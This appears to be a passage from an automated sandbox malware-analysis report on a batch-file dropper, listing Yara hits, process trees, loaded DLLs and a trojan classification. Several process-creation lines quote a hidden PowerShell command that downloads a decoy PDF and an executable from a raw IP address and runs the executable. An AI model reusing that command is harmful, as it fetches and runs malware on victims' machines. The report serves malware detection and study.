                      Source: Yara matchFile source: 23.3.readme.exe.2f50000.6.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 24.3.fontdrvhost.exe.4eb0000.6.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 24.3.fontdrvhost.exe.4eb0000.6.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 00000018.00000003.1631623482.0000000004EB0000.00000004.00000001.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000017.00000003.1623131121.0000000002F50000.00000004.00000001.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000017.00000003.1623575797.0000000003170000.00000004.00000001.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000018.00000003.1631831483.00000000050D0000.00000004.00000001.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: readme.exe PID: 9148, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: fontdrvhost.exe PID: 9200, type: MEMORYSTR

                      System Summary

                      barindex
                      Source: C:\Users\user\AppData\Local\Temp\readme.exeFile dump: DiskTuner.exe.19.dr 979567349Jump to dropped file
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\readme.exeJump to dropped file
                      Source: C:\Windows\System32\svchost.exeProcess Stats: CPU usage > 49%
                      Source: C:\Windows\System32\fontdrvhost.exeCode function: 28_2_00000205BFC31CF4 NtAcceptConnectPort,CloseHandle,28_2_00000205BFC31CF4
                      Source: C:\Windows\System32\fontdrvhost.exeCode function: 28_2_00000205BFC315C0 NtAcceptConnectPort,28_2_00000205BFC315C0
                      Source: C:\Windows\System32\fontdrvhost.exeCode function: 28_2_00000205BFC30AC8 NtAcceptConnectPort,NtAcceptConnectPort,28_2_00000205BFC30AC8
                      Source: C:\Windows\System32\fontdrvhost.exeCode function: 28_2_00000205BFC31AA4 NtAcceptConnectPort,NtAcceptConnectPort,28_2_00000205BFC31AA4
                      Source: C:\Windows\System32\svchost.exeFile created: C:\Windows\ServiceProfiles\LocalService\AppData\Local\FontCache\Fonts\Download-1.tmpJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\readme.exeCode function: 19_2_0040A02019_2_0040A020
                      Source: C:\Users\user\AppData\Local\Temp\readme.exeCode function: 19_2_0042D30019_2_0042D300
                      Source: C:\Users\user\AppData\Local\Temp\readme.exeCode function: 19_2_0043C3C019_2_0043C3C0
                      Source: C:\Users\user\AppData\Local\Temp\readme.exeCode function: 19_2_0042D39B19_2_0042D39B
                      Source: C:\Users\user\AppData\Local\Temp\readme.exeCode function: 19_2_0042D4F919_2_0042D4F9
                      Source: C:\Users\user\AppData\Local\Temp\readme.exeCode function: 19_2_0041B4B019_2_0041B4B0
                      Source: C:\Users\user\AppData\Local\Temp\readme.exeCode function: 19_2_0042067019_2_00420670
                      Source: C:\Users\user\AppData\Local\Temp\readme.exeCode function: 19_2_0041662119_2_00416621
                      Source: C:\Users\user\AppData\Local\Temp\readme.exeCode function: 19_2_0045E87019_2_0045E870
                      Source: C:\Users\user\AppData\Local\Temp\readme.exeCode function: 19_2_0047DA0019_2_0047DA00
                      Source: C:\Users\user\AppData\Local\Temp\readme.exeCode function: 19_2_0040ACD019_2_0040ACD0
                      Source: C:\Users\user\AppData\Local\Temp\readme.exeCode function: 19_2_00429E1019_2_00429E10
                      Source: C:\Users\user\AppData\Local\Temp\readme.exeCode function: 19_2_00464EE019_2_00464EE0
                      Source: C:\Users\user\AppData\Local\Temp\readme.exeCode function: 23_3_007A81D223_3_007A81D2
                      Source: C:\Users\user\AppData\Local\Temp\readme.exeCode function: 23_3_0079C23123_3_0079C231
                      Source: C:\Users\user\AppData\Local\Temp\readme.exeCode function: 23_3_0079C40023_3_0079C400
                      Source: C:\Users\user\AppData\Local\Temp\readme.exeCode function: 23_2_0040A02023_2_0040A020
                      Source: C:\Users\user\AppData\Local\Temp\readme.exeCode function: 23_2_0042D30023_2_0042D300
                      Source: C:\Users\user\AppData\Local\Temp\readme.exeCode function: 23_2_0042D39B23_2_0042D39B
                      Source: C:\Users\user\AppData\Local\Temp\readme.exeCode function: 23_2_004033A123_2_004033A1
                      Source: C:\Users\user\AppData\Local\Temp\readme.exeCode function: 23_2_0042D4F923_2_0042D4F9
                      Source: C:\Users\user\AppData\Local\Temp\readme.exeCode function: 23_2_0041B4B023_2_0041B4B0
                      Source: C:\Users\user\AppData\Local\Temp\readme.exeCode function: 23_2_0042067023_2_00420670
                      Source: C:\Users\user\AppData\Local\Temp\readme.exeCode function: 23_2_0041662123_2_00416621
                      Source: C:\Users\user\AppData\Local\Temp\readme.exeCode function: 23_2_0045E87023_2_0045E870
                      Source: C:\Users\user\AppData\Local\Temp\readme.exeCode function: 23_2_0047DA0023_2_0047DA00
                      Source: C:\Users\user\AppData\Local\Temp\readme.exeCode function: 23_2_0040ACD023_2_0040ACD0
                      Source: C:\Users\user\AppData\Local\Temp\readme.exeCode function: 23_2_00429E1023_2_00429E10
                      Source: C:\Users\user\AppData\Local\Temp\readme.exeCode function: 23_2_00464EE023_2_00464EE0
                      Source: C:\Windows\System32\fontdrvhost.exeCode function: 28_2_00000205BFC30C7028_2_00000205BFC30C70
                      Source: Joe Sandbox ViewDropped File: C:\Users\user\AppData\Local\Temp\readme.exe D0F631F6269C14FE7622F4A1085F99E6BFD235942CE57715914EE4A319484A55
                      Source: Joe Sandbox ViewDropped File: C:\Users\user\Videos\DiskTuner\Bin\DiskTuner.exe 6F2EB3AE312F322B8AAFC8EEFF1E402325D6E18A7D37DDA3A0FAD727845D19C8
                      Source: C:\Users\user\AppData\Local\Temp\readme.exeCode function: String function: 00435140 appears 66 times
                      Source: C:\Users\user\AppData\Local\Temp\readme.exeCode function: String function: 004C9120 appears 58 times
                      Source: C:\Users\user\AppData\Local\Temp\readme.exeCode function: String function: 0079CD90 appears 33 times
                      Source: C:\Users\user\AppData\Local\Temp\readme.exeCode function: String function: 00435350 appears 68 times
                      Source: C:\Users\user\AppData\Local\Temp\readme.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 9148 -s 424
                      Source: readme.exe, 00000013.00000002.1650056640.0000000000C59000.00000040.00001000.00020000.00000000.sdmp, readme.exe, 00000013.00000002.1648616432.0000000000674000.00000040.00000001.01000000.0000000E.sdmp, readme.exe, 00000017.00000003.1619124085.00000000007B9000.00000040.00000400.00020000.00000000.sdmp, readme.exe, 00000017.00000003.1625143937.00000000007B9000.00000040.00000400.00020000.00000000.sdmpBinary or memory string: .a_po^ ojYd.o B U.R G v.Q_F& ZNH K.9.sV`OQ qOq_A( N5.j P.X z.k.Yf_HL.P.L`.C Ue_q_B_t.h{_yr\=A f.3_q_Fvb_H_bm W.UP#.by_iY.Yw I.Y_G p.3c g.Zy S v.U.N C_m Z_i.H_j B l_DH_Pd.iz_O.f~ U z_Mv_d7 T Mz.f.594/}_m kS.v.D u.rZu.S G.N_x.V J.Q.G FO^.X<.6_fv.V ny.L,_E.2.m I_l.b$ Mx sZ.K! p.Y.U.V:U.89 R_H F3.d_R A UQ.C_y y Y Jb.Q_S.N.s< l_Ab~[_w9zV?!C9.N_HQ)*_n R.tP Ww_u aU;.V EPk Xr.Q0.y.A!]_b!7 g.R_pF.E_b o.o.q.o_E.T_rdfw.c}_ck.4.Y_w:_P.B(#`_xy_i.3_Y.A_N.q.6.YE_S_T.R H n.R_d_F.V.s_R68).I aL q.H b.W.Q!.r b_w c c$_va.X_v.tRm l.sln_D c! C.7_F m M_j6 zr.w F i}%_N.RB A7_wG_m.4_A#&.G mCx.Q_s N pTS.n.e C.4_v_C_Q.e J q7E V P.LP_Q.kTN_c.F.D gc.hT_s_Q1
                      Source: readme.exe, readme.exe, 00000013.00000002.1650056640.0000000000C59000.00000040.00001000.00020000.00000000.sdmp, readme.exe, 00000013.00000002.1648616432.0000000000674000.00000040.00000001.01000000.0000000E.sdmp, readme.exe, 00000017.00000003.1619124085.00000000007B9000.00000040.00000400.00020000.00000000.sdmp, readme.exe, 00000017.00000003.1625143937.00000000007B9000.00000040.00000400.00020000.00000000.sdmpBinary or memory string: .tRm l.sln_D c! C.7_F m M_j6 zr.w F i}%_N.RB A7_wG_m.4_A#&.G mCx.Q_s N pTS.n.e C.4_v_
                      Source: classification engineClassification label: mal100.troj.evad.winBAT@62/257@10/13
                      Source: C:\Users\user\AppData\Local\Temp\readme.exeCode function: 19_2_004F9340 CoCreateInstance,19_2_004F9340
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCacheJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMutant created: NULL
                      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5568:120:WilError_03
                      Source: C:\Windows\SysWOW64\fontdrvhost.exeMutant created: \Sessions\1\BaseNamedObjects\MSCTF.Asm.{00000009-47c6bd2c-b184-e8d685-d520ae930867}
                      Source: C:\Windows\System32\WerFault.exeMutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess2032
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_30wvzo4t.ayy.ps1Jump to behavior
                      Source: unknownProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\098aPtSbmd.bat" "
                      Source: C:\Windows\SysWOW64\fontdrvhost.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_Processor
                      Source: C:\Windows\SysWOW64\fontdrvhost.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_Processor
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile read: C:\Program Files (x86)\desktop.iniJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\SystemCertificates\CAJump to behavior
                      Source: unknownProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\098aPtSbmd.bat" "
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -WindowStyle Hidden -Command "IWR -Uri "http://95.169.201.100:18960/uploads/team-1/readme.pdf" -OutFile "$env:temp\readme.pdf" ; Start-Process 'msedge.exe' -ArgumentList \"--kiosk $env:temp\readme.pdf\" ; IWR -Uri "http://95.169.201.100:18960/uploads/team-1/readme.exe" -OutFile "$env:temp\readme.exe" ; start "$env:temp\readme.exe""
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --kiosk C:\Users\user~1\AppData\Local\Temp\readme.pdf
                      Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
                      Source: unknownProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --kiosk --flag-switches-begin --flag-switches-end --disable-nacl --do-not-de-elevate "C:\Users\user~1\AppData\Local\Temp\readme.pdf"
                      Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=2152 --field-trial-handle=2028,i,6286919390183258401,11703614635842124425,262144 /prefetch:3
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Users\user\AppData\Local\Temp\readme.exe "C:\Users\user~1\AppData\Local\Temp\readme.exe"
                      Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-GB --service-sandbox-type=asset_store_service --mojo-platform-channel-handle=6456 --field-trial-handle=2028,i,6286919390183258401,11703614635842124425,262144 /prefetch:8
                      Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=entity_extraction_service.mojom.Extractor --lang=en-GB --service-sandbox-type=entity_extraction --onnx-enabled-for-ee --mojo-platform-channel-handle=6944 --field-trial-handle=2028,i,6286919390183258401,11703614635842124425,262144 /prefetch:8
                      Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=ppapi --lang=en-GB --device-scale-factor=1 --ppapi-antialiased-text-enabled=1 --ppapi-subpixel-rendering-setting=1 --mojo-platform-channel-handle=7336 --field-trial-handle=2028,i,6286919390183258401,11703614635842124425,262144 /prefetch:6
                      Source: C:\Users\user\AppData\Local\Temp\readme.exeProcess created: C:\Users\user\AppData\Local\Temp\readme.exe "C:\Users\user~1\AppData\Local\Temp\readme.exe"
                      Source: C:\Users\user\AppData\Local\Temp\readme.exeProcess created: C:\Windows\SysWOW64\fontdrvhost.exe "C:\Windows\System32\fontdrvhost.exe"
                      Source: C:\Users\user\AppData\Local\Temp\readme.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 9148 -s 424
                      Source: C:\Windows\SysWOW64\fontdrvhost.exeProcess created: C:\Windows\System32\fontdrvhost.exe "C:\Windows\System32\fontdrvhost.exe"
                      Source: C:\Windows\System32\fontdrvhost.exeProcess created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -u -p 2032 -s 136
                      Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=edge_search_indexer.mojom.SearchIndexerInterfaceBroker --lang=en-GB --service-sandbox-type=search_indexer --message-loop-type-ui --mojo-platform-channel-handle=2432 --field-trial-handle=2028,i,6286919390183258401,11703614635842124425,262144 /prefetch:8
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -WindowStyle Hidden -Command "IWR -Uri "http://95.169.201.100:18960/uploads/team-1/readme.pdf" -OutFile "$env:temp\readme.pdf" ; Start-Process 'msedge.exe' -ArgumentList \"--kiosk $env:temp\readme.pdf\" ; IWR -Uri "http://95.169.201.100:18960/uploads/team-1/readme.exe" -OutFile "$env:temp\readme.exe" ; start "$env:temp\readme.exe""Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --kiosk C:\Users\user~1\AppData\Local\Temp\readme.pdf Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Users\user\AppData\Local\Temp\readme.exe "C:\Users\user~1\AppData\Local\Temp\readme.exe" Jump to behavior
                      Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknownJump to behavior
                      Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknownJump to behavior
                      Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknownJump to behavior
                      Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknownJump to behavior
                      Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=2152 --field-trial-handle=2028,i,6286919390183258401,11703614635842124425,262144 /prefetch:3Jump to behavior
                      Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknownJump to behavior
                      Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknownJump to behavior
                      Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknownJump to behavior
                      Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknownJump to behavior
                      Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknownJump to behavior
                      Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknownJump to behavior
                      Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknownJump to behavior
                      Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknownJump to behavior
                      Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknownJump to behavior
                      Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknownJump to behavior
                      Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknownJump to behavior
                      Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknownJump to behavior
                      Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknownJump to behavior
                      Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-GB --service-sandbox-type=asset_store_service --mojo-platform-channel-handle=6456 --field-trial-handle=2028,i,6286919390183258401,11703614635842124425,262144 /prefetch:8Jump to behavior
                      Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=entity_extraction_service.mojom.Extractor --lang=en-GB --service-sandbox-type=entity_extraction --onnx-enabled-for-ee --mojo-platform-channel-handle=6944 --field-trial-handle=2028,i,6286919390183258401,11703614635842124425,262144 /prefetch:8Jump to behavior
                      Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: C:\Windows\System32\fontdrvhost.exe "C:\Windows\System32\fontdrvhost.exe"Jump to behavior
                      Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=ppapi --lang=en-GB --device-scale-factor=1 --ppapi-antialiased-text-enabled=1 --ppapi-subpixel-rendering-setting=1 --mojo-platform-channel-handle=7336 --field-trial-handle=2028,i,6286919390183258401,11703614635842124425,262144 /prefetch:6Jump to behavior
                      Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknownJump to behavior
                      Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknownJump to behavior
                      Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknownJump to behavior
                      Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknownJump to behavior
                      Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknownJump to behavior
                      Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknownJump to behavior
                      Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknownJump to behavior
                      Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknownJump to behavior
                      Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknownJump to behavior
                      Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknownJump to behavior
                      Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknownJump to behavior
                      Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknownJump to behavior
                      Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknownJump to behavior
                      Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknownJump to behavior
                      Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknownJump to behavior
                      Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknownJump to behavior
                      Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=edge_search_indexer.mojom.SearchIndexerInterfaceBroker --lang=en-GB --service-sandbox-type=search_indexer --message-loop-type-ui --mojo-platform-channel-handle=2432 --field-trial-handle=2028,i,6286919390183258401,11703614635842124425,262144 /prefetch:8Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\readme.exeProcess created: C:\Users\user\AppData\Local\Temp\readme.exe "C:\Users\user~1\AppData\Local\Temp\readme.exe"
                      Source: C:\Users\user\AppData\Local\Temp\readme.exeProcess created: C:\Windows\SysWOW64\fontdrvhost.exe "C:\Windows\System32\fontdrvhost.exe"
                      Source: C:\Windows\SysWOW64\fontdrvhost.exeProcess created: C:\Windows\System32\fontdrvhost.exe "C:\Windows\System32\fontdrvhost.exe"
                      Source: C:\Windows\System32\cmd.exeSection loaded: cmdext.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc6.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winnsi.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasapi32.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasman.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rtutils.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mswsock.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winhttp.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kdscli.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntasn1.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncrypt.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: edputil.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wintypes.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appresolver.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: bcp47langs.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: slc.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sppc.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: apphelp.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: kernel.appcore.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: qmgr.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: bitsperf.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: powrprof.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: xmllite.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: firewallapi.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: esent.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: umpdc.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: dnsapi.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: iphlpapi.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: fwbase.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: wldp.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: ntmarta.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: profapi.dllJump to behavior
